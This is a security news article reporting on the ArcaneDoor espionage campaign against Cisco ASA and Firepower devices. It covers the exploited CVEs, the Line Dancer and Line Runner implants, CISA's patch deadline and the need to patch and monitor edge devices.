A recent malware campaign used two zero-day vulnerabilities in Cisco networking equipment to distribute bespoke malware and enable surreptitious data collection on target environments.
Cisco Talos tracked the activity under the name UAT4356 (also known as Storm-1849 by Microsoft), called it ArcaneDoor, and attributed it to the activities of a hitherto unreported skilled state-sponsored attacker.
“UAT4356 deployed two backdoors as components of this campaign, ‘Line Runner’ and ‘Line Dancer,’ which were used collectively to conduct malicious actions on-target, which included configuration modification, reconnaissance, network traffic capture/exfiltration and potentially lateral movement,” Talos stated.
Early in January 2024, the intrusions were discovered and verified, and they involved the exploitation of two vulnerabilities:
- CVE-2024-20353 (with an 8.6 CVSS score) – Denial-of-service vulnerability in the web services of the Cisco Adaptive Security Appliance and Firepower Threat Defense Applications
- CVE-2024-20359 (6.0 on the CVSS) – Permanent Local Code Execution Vulnerability in Firepower Threat Defense Software and Cisco Adaptive Security Appliance
It’s important to remember that a zero-day exploit is a tactic or assault used by a malevolent actor to gain access to a system by taking advantage of an unidentified security flaw.
The second vulnerability requires administrator-level privileges to exploit but permits a local attacker to run any code with root-level access. In addition to CVE-2024-20353 and CVE-2024-20359, a command injection vulnerability in the same appliance (CVE-2024-20358, CVSS score: 6.0) that was found during internal security testing is addressed.
The vulnerabilities have been added to the Known Exploited Vulnerabilities (KEV) database by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and federal agencies are required to implement the vendor-provided remedies by May 1, 2024.
It is yet uncertain which specific initial access method was utilized to breach the devices, although UAT4356 is reported to have been preparing for it as early as July 2023.
After a successful foothold, two implants, Line Dancer and Line Runner, are deployed. Line Dancer is an in-memory backdoor that allows attackers to upload and run any shellcode payload, including packet captures and system log disablement.
However, by taking advantage of the previously described zero-days, Line Runner is a persistent HTTP-based Lua implant deployed on the Cisco Adaptive Security Appliance (ASA) and designed to withstand reboots and updates. It has been seen retrieving data that line dancers have staged.
According to a joint advisory released by cybersecurity agencies from Australia, Canada, and the United Kingdom, “it is suspected that Line Runner may be present on a compromised device even if Line Dancer is not (e.g., as a persistent backdoor, or where an impacted ASA has not yet received full operational attention from the malicious actors).”
UAT4356 is reported to have contributed to the attack’s sophistication and elusiveness by paying close attention to concealing digital traces at every stage and by using complex techniques to avoid memory forensics and reduce the likelihood of detection.
The statement implies that the threat actors possess a comprehensive comprehension of the ASA’s internal operations and the “forensic actions commonly performed by Cisco for network device integrity validation.”
Although it’s unknown exactly whose nation is behind ArcaneDoor, state-sponsored hackers from China and Russia have previously attacked Cisco routers for cyberespionage. Additionally, Cisco Talos did not say how many customers were affected by these intrusions.
Given the recent spate of attacks against Barracuda Networks, Fortinet, Ivanti, Palo Alto Networks, and VMware, it is clear that endpoint detection and response (EDR) solutions are not always present on edge devices and platforms, such as email servers, firewalls, and VPNs.
“Perimeter network devices are the perfect intrusion point for espionage-focused campaigns,” Talos stated.
These devices must be regularly and quickly patched, using the most recent hardware and software versions and settings, and actively monitored from a security standpoint because they are a vital path for data entering and leaving the network. An actor can directly enter an organization, reroute or alter traffic, and keep an eye on network communications by taking control of these devices.”
Contact us if you have any questions or concerns.